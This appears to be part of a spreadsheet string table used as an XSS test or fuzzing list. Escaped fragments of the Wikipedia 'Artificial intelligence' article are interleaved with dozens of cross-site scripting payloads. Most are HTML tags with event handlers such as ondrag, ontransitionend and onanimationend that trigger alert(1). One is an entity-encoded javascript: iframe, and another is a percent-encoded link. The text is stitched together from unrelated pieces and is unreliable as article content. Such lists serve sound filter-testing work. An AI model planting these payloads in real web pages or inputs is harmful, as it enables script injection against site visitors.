title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Mind%2C+language+and+society&amp;amp;rft.place=New+York%2C+NY&amp;amp;rft.pub=Basic+Books&amp;amp;rft.date=1999&amp;amp;rft_id=info%3Aoclcnum%2F231867665&amp;amp;rft.isbn=978-0-465-04521-1&amp;amp;rft.aulast=Searle&amp;amp;rft.aufirst=John&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fmindlanguagesoci00sear&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=67" title="Edit section: Transhumanism"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.washingtonpost.com/outlook/in-the-race-for-supremacy-in-artificial-intelligence-its-us-innovation-vs-chinese-ambition/2018/11/02/013e0030-b08c-11e8-aed9-001309990777_story.html"&gt;"Review | How two AI superpowers – the U.S. and China – battle for supremacy in the field" &lt;/a&gt;. &lt;i&gt;Washington Post &lt;/i&gt;. 2 November 2018&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;4 November </t>
  </si>
  <si>
    <t>&lt;tfoot draggable="true" ondragend="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-394"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-394"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;big id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_artificial_intelligence" title="Glossary of artificial intelligence"&gt;Artificial intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Integrated_development_environment" title="Integrated development environment"&gt;Integrated development environment &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">d="alert('');\")"; </t>
  </si>
  <si>
    <t>&lt;nav onmouseenter="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;table onmouseout="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;meta draggable="true" ondragleave="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;element onmouseup="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;textarea id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;dialog draggable="true" ondrag="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-203"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-203"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;listing ondragover=alert(1) contenteditable&gt;drop here&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;animatemotion onpointerdown=alert(1)&gt;XSS&lt;/animatemotion&gt;</t>
  </si>
  <si>
    <t>&lt;dd onpointerdown=alert(1)&gt;XSS&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;footer onbeforecut="alert(1)" contenteditable&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;center draggable="true" ondragend="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;iframe id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onmousemove="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Knowledge_representation" class="mw-redirect" title="Knowledge representation"&gt;Knowledge representation &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;body class="wy-body-for-nav"&gt;   </t>
  </si>
  <si>
    <t>&lt;nextid onmouseover="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Genetic_programming" title="Genetic programming"&gt;Genetic programming &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;audio oncanplay=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;frame id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onbeforecut="alert(1)" contenteditable&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;p id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;strike style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;sup id="cite_ref-151" class="reference"&gt;&lt;a href="#cite_note-151"&gt;&amp;#91;148&amp;#93; &lt;/a&gt; &lt;/sup&gt; hypothetical AGI breakthroughs could include the development of reflective architectures that can engage in decision-theoretic metareasoning, and figuring out how to "slurp up" a comprehensive knowledge base from the entire unstructured &lt;a href="/wiki/World_Wide_Web" title="World Wide Web"&gt;Web &lt;/a&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;External links </t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="versioning.html"&gt;&lt;span class="doc"&gt;Versioning and API Stability</t>
  </si>
  <si>
    <t>&lt;video onmouseover="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;template draggable="true" ondragenter="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;head onbeforecut="alert(1)" contenteditable&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;nextid id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;caption onpaste="alert(1)" contenteditable&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;input type="hidden" name="check_keywords" value="yes" /&gt;</t>
  </si>
  <si>
    <t>&lt;pre onkeyup="alert(1)" contenteditable&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Chinese_room-405"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Chinese_room_405-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Fukushima, K. (1980). "Neocognitron: A self-organizing neural network model for a mechanism of pattern recognition unaffected by shift in position". &lt;i&gt;Biological Cybernetics &lt;/i&gt;. &lt;b&gt;36 &lt;/b&gt; (4): 193–202. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1007%2Fbf00344251"&gt;10.1007/bf00344251 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/7370364"&gt;7370364 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Biological+Cybernetics&amp;amp;rft.atitle=Neocognitron%3A+A+self-organizing+neural+network+model+for+a+mechanism+of+pattern+recognition+unaffected+by+shift+in+position&amp;amp;rft.volume=36&amp;amp;rft.issue=4&amp;amp;rft.pages=193-202&amp;amp;rft.date=1980&amp;amp;rft_id=info%3Adoi%2F10.1007%2Fbf00344251&amp;amp;rft_id=info%3Apmid%2F7370364&amp;amp;rft.aulast=Fukushima&amp;amp;rft.aufirst=K.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;discard onbegin=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;figure onpointerover=alert(1)&gt;XSS&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;spacer draggable="true" ondragenter="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFHowe1994"&gt;Howe 1994 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rp onbeforecopy="alert(1)" contenteditable&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Intractability-68"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Intractability_68-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Intractability_68-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;h3  id="p-coll-print_export-label"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Educational_robotics" title="Educational robotics"&gt;Educational &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;script ondblclick="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;bgsound id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Medical_cybernetics" title="Medical cybernetics"&gt;Medical cybernetics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ins onpointerenter=alert(1)&gt;XSS&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;data id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/data&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Many components contribute to the functioning of self-driving cars. These vehicles incorporate systems such as braking, lane changing, collision prevention, navigation and mapping. Together, these systems, as well as high performance computers, are integrated into one complex vehicle.&lt;sup id="cite_ref-308" class="reference"&gt;&lt;a href="#cite_note-308"&gt;&amp;#91;297&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;While such a "victory of the neats" may be a consequence of the field becoming more mature, &lt;a href="/wiki/Artificial_Intelligence:_A_Modern_Approach" title="Artificial Intelligence: A Modern Approach"&gt;AIMA &lt;/a&gt; states that in practice both &lt;a href="/wiki/Neats_and_scruffies" title="Neats and scruffies"&gt;neat and scruffy &lt;/a&gt; approaches continue to be necessary in AI research. </t>
  </si>
  <si>
    <t>&lt;u onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/u&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;strong id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;i data-toggle="wy-nav-top" class="fa fa-bars"&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;strike onbeforecopy="alert(1)" contenteditable&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;template onbeforecopy="alert(1)" contenteditable&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onmouseup="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The field of machine ethics is concerned with giving machines ethical principles, or a procedure for discovering a way to resolve the ethical dilemmas they might encounter, enabling them to function in an ethically responsible manner through their own ethical decision making.&lt;sup id="cite_ref-autogenerated1_397-0" class="reference"&gt;&lt;a href="#cite_note-autogenerated1-397"&gt;&amp;#91;386&amp;#93; &lt;/a&gt; &lt;/sup&gt; The field was delineated in the AAAI Fall 2005 Symposium on Machine Ethics: "Past research concerning the relationship between technology and ethics has largely focused on responsible and irresponsible use of technology by human beings, with a few people being interested in how human beings ought to treat machines. In all cases, only human beings have engaged in ethical reasoning. The time has come for adding an ethical dimension to at least some machines. Recognition of the ethical ramifications of behavior involving machines, as well as recent and potential developments in machine autonomy, necessitate this. In contrast to computer hacking, software property issues, privacy issues and other topics normally ascribed to computer ethics, machine ethics is concerned with the behavior of machines towards human users and other machines. Research in machine ethics is key to alleviating concerns with autonomous systems—it could be argued that the notion of autonomous machines without such a dimension is at the root of all fear concerning machine intelligence. Further, investigation of machine ethics could enable the discovery of problems with current ethical theories, advancing our thinking about Ethics."&lt;sup id="cite_ref-autogenerated2_398-0" class="reference"&gt;&lt;a href="#cite_note-autogenerated2-398"&gt;&amp;#91;387&amp;#93; &lt;/a&gt; &lt;/sup&gt; Machine ethics is sometimes referred to as machine morality, computational ethics or computational morality. A variety of perspectives of this nascent field can be found in the collected edition "Machine Ethics"&lt;sup id="cite_ref-autogenerated1_397-1" class="reference"&gt;&lt;a href="#cite_note-autogenerated1-397"&gt;&amp;#91;386&amp;#93; &lt;/a&gt; &lt;/sup&gt; that stems from the AAAI Fall 2005 Symposium on Machine Ethics.&lt;sup id="cite_ref-autogenerated2_398-1" class="reference"&gt;&lt;a href="#cite_note-autogenerated2-398"&gt;&amp;#91;387&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;rp onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/rp&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;option ondrop=alert(1) contenteditable&gt;drop here&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;tt onmousedown="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;354–360, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Symbolic_vs._sub-symbolic-18"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Symbolic_vs._sub-symbolic_18-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Symbolic_vs._sub-symbolic_18-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Bacterial_Colony_Optimization" class="mw-redirect" title="Bacterial Colony Optimization"&gt;Bacterial Colony Optimization &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;del onpointermove=alert(1)&gt;XSS&lt;/del&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-52"&gt;&lt;a href="#Devaluation_of_humanity"&gt;&lt;span class="tocnumber"&gt;8.2.2 </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;408–414, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;nav style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Ivakhnenko, A. G. (1971). &lt;a rel="nofollow" class="external text" href="https://semanticscholar.org/paper/b7efb6b6f7e9ffa017e970a098665f76d4dfeca2"&gt;"Polynomial Theory of Complex Systems" &lt;/a&gt;. &lt;i&gt;IEEE Transactions on Systems, Man, and Cybernetics &lt;/i&gt; (4): 364–378. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2FTSMC.1971.4308320"&gt;10.1109/TSMC.1971.4308320 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IEEE+Transactions+on+Systems%2C+Man%2C+and+Cybernetics&amp;amp;rft.atitle=Polynomial+Theory+of+Complex+Systems&amp;amp;rft.issue=4&amp;amp;rft.pages=364-378&amp;amp;rft.date=1971&amp;amp;rft_id=info%3Adoi%2F10.1109%2FTSMC.1971.4308320&amp;amp;rft.aulast=Ivakhnenko&amp;amp;rft.aufirst=A.+G.&amp;amp;rft_id=https%3A%2F%2Fsemanticscholar.org%2Fpaper%2Fb7efb6b6f7e9ffa017e970a098665f76d4dfeca2&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;option ondblclick="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;input type=checkbox id=x onfocus=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_astronomy" title="Glossary of astronomy"&gt;Astronomy &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;blink onload=alert(1)&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;base draggable="true" ondragend="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;address style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;mark onkeypress="alert(1)" contenteditable&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;dialog oncut="alert(1)" contenteditable&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;span draggable="true" ondragleave="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;u draggable="true" ondragenter="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;rb onkeypress="alert(1)" contenteditable&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFCNN2006" class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="http://www.cnn.com/2006/TECH/science/07/24/ai.bostrom/"&gt;"AI set to exceed human brain power" &lt;/a&gt;. &lt;i&gt;CNN &lt;/i&gt;. 26 July 2006. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20080219001624/http://www.cnn.com/2006/TECH/science/07/24/ai.bostrom/"&gt;Archived &lt;/a&gt; from the original on 19 February 2008. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=CNN&amp;amp;rft.atitle=AI+set+to+exceed+human+brain+power&amp;amp;rft.date=2006-07-26&amp;amp;rft_id=http%3A%2F%2Fwww.cnn.com%2F2006%2FTECH%2Fscience%2F07%2F24%2Fai.bostrom%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;input oninvalid=alert(1) required&gt;&lt;input type=submit&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;pre id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;kbd draggable="true" ondragend="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onclick="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Lorica, Ben (18 December 2017). &lt;a rel="nofollow" class="external text" href="https://www.oreilly.com/ideas/the-state-of-ai-adoption"&gt;"The state of AI adoption" &lt;/a&gt;. &lt;i&gt;O'Reilly Media &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;2 May </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;kbd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;dir onmousedown="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;sub ondblclick="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;b onmouseleave="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-14"&gt;&lt;a href="#Approaches"&gt;&lt;span class="tocnumber"&gt;5 </t>
  </si>
  <si>
    <t>&lt;optgroup onpointermove=alert(1)&gt;XSS&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;animatetransform onpointerenter=alert(1)&gt;XSS&lt;/animatetransform&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onmouseleave="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;header ondblclick="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;basefont id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a rel="nofollow" class="external text" href="https://ishti.org/2018/11/19/using-artificial-intelligence-to-predict-flight-delays/"&gt;Using AI to predict flight delays &lt;/a&gt;, Ishti.org. </t>
  </si>
  <si>
    <t>&lt;li onkeydown="alert(1)" contenteditable&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;time onmousemove="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Recurrent_neural_networks-259"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Recurrent_neural_networks_259-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Karl_Pearson" title="Karl Pearson"&gt;Karl Pearson &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;ol id=x tabindex=1 onfocus=alert(1)&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onmouseout="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onbeforecut="alert(1)" contenteditable&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;ins onmousedown="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;content ondragover=alert(1) contenteditable&gt;drop here&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;mark id=x tabindex=1 onactivate=alert(1)&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Political scientist &lt;a href="/wiki/Charles_T._Rubin" title="Charles T. Rubin"&gt;Charles T. Rubin &lt;/a&gt; believes that AI can be neither designed nor guaranteed to be benevolent.&lt;sup id="cite_ref-399" class="reference"&gt;&lt;a href="#cite_note-399"&gt;&amp;#91;388&amp;#93; &lt;/a&gt; &lt;/sup&gt; He argues that "any sufficiently advanced benevolence may be indistinguishable from malevolence." Humans should not assume machines or robots would treat us favorably because there is no &lt;i&gt;a priori &lt;/i&gt; reason to believe that they would be sympathetic to our system of morality, which has evolved along with our particular biology (which AIs would not share). Hyper-intelligent software may not necessarily decide to support the continued existence of humanity and would be extremely difficult to stop. This topic has also recently begun to be discussed in academic publications as a real source of risks to civilization, humans, and planet Earth.</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;sub style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;listing oncontextmenu="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">           &lt;div itemprop="articleBody"&gt;            </t>
  </si>
  <si>
    <t>&lt;rtc onkeypress="alert(1)" contenteditable&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Economist &lt;a href="/wiki/Herbert_A._Simon" title="Herbert A. Simon"&gt;Herbert Simon &lt;/a&gt; and &lt;a href="/wiki/Allen_Newell" title="Allen Newell"&gt;Allen Newell &lt;/a&gt; studied human problem-solving skills and attempted to formalize them, and their work laid the foundations of the field of artificial intelligence, as well as &lt;a href="/wiki/Cognitive_science" title="Cognitive science"&gt;cognitive science &lt;/a&gt;, &lt;a href="/wiki/Operations_research" title="Operations research"&gt;operations research &lt;/a&gt; and &lt;a href="/wiki/Management_science" title="Management science"&gt;management science &lt;/a&gt;. Their research team used the results of &lt;a href="/wiki/Psychology" title="Psychology"&gt;psychological &lt;/a&gt; experiments to develop programs that simulated the techniques that people used to solve problems. This tradition, centered at &lt;a href="/wiki/Carnegie_Mellon_University" title="Carnegie Mellon University"&gt;Carnegie Mellon University &lt;/a&gt; would eventually culminate in the development of the &lt;a href="/wiki/Soar_(cognitive_architecture)" title="Soar (cognitive architecture)"&gt;Soar &lt;/a&gt; architecture in the middle 1980s.&lt;sup id="cite_ref-AI_at_CMU_in_the_60s_159-0" class="reference"&gt;&lt;a href="#cite_note-AI_at_CMU_in_the_60s-159"&gt;&amp;#91;156&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Soar_160-0" class="reference"&gt;&lt;a href="#cite_note-Soar-160"&gt;&amp;#91;157&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup id=x tabindex=1 onfocus=alert(1)&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, p.&amp;#160;489, who calls it "a determinedly scruffy enterprise" &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;small oncopy="alert(1)" contenteditable&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;slot onbeforepaste="alert(1)" contenteditable&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-46"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-46"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;tbody oncontextmenu="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onmousedown="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;textarea draggable="true" ondrag="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"&gt;&lt;/A&gt;</t>
  </si>
  <si>
